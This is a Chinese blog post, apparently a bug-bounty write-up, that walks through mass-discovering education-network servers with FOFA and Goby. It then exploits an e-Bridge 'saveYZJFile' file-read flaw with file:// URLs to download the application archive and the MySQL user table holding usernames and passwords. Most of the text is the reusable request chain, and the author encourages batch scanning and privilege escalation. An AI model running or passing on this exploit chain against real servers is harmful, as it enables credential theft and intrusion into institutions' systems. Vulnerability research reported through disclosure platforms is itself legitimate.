首页 > 编程知识 正文

SRC实战

时间:2023-05-04 04:53:58 阅读:197152 作者:416

最近事太多了,没办法文章写的断断续续。已经两周没更新了,本来计划的内容还没有准备。想到之前有粉丝说出一些实战的。那就出些简单的。
今天,我就拿我前几天的案例说说。
首先,我通过FOFA进行批量查询org=“China Education and Research Network Center” && port=“8088”

然后通过Goby进行测试

用goby自带poc测试
进一步测试(扩大战果):
访问http://马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge&fileExt=txt
获得id:d5782d64b44e4c68999d094a32001c23

访问http:///马赛克:8088/file/fileNoLogin/d5782d64b44e4c68999d094a32001c23
发现ebridge.tar.gz
访问http:///马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge/ebridge.tar.gz&fileExt=txt
获得id:fb5a41d9af304a1b992e175ba68ac4e8
访问http:///马赛克:8088/file/fileNoLogin/fb5a41d9af304a1b992e175ba68ac4e8
下载ebridge.tar.gz
解压发现ebridgemysqldatamysql下存在user.MYD

为防止后期有修改,故访问http://马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge/mysql/data/mysql/user.MYD&fileExt=txt
获得id:d1251c6b1c8e4434add56fd6b712be96
访问http://马赛克:8088/file/fileNoLogin/d1251c6b1c8e4434add56fd6b712be96
即可以获得最新user.MYD

打开获得用户和密码
至此结束。
好,现在我们来总结一下。
首先,我们进行教育src挖掘的时候最好批量扫,因为一个一个的效率不高,我们的目的是积分,最好是批量扫。当然如果你有源码,可以试着找一下通用漏洞。
其次,在我们扫描后发现有自己不知道的漏洞,这时候可以百度一下比如说我们不懂xx漏洞,我们搜一下xx漏洞利用一般都有人写过。
还有,当我们成功复现漏洞后,最好尝试提权扩大战果。值得注意的是,千万不要借此扫内网。扫出事了可别怪我没提醒。
以下是教育src平台的测试规则:
最后,我们提交后别报得积分的希望,多半重复。挖教育src心态必须好,可能你辛辛苦苦挖了半天全是重复的。(我这个就是重复的)
(ps:终于赶了一篇出来,还是求各位看官给点评论和关注)

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。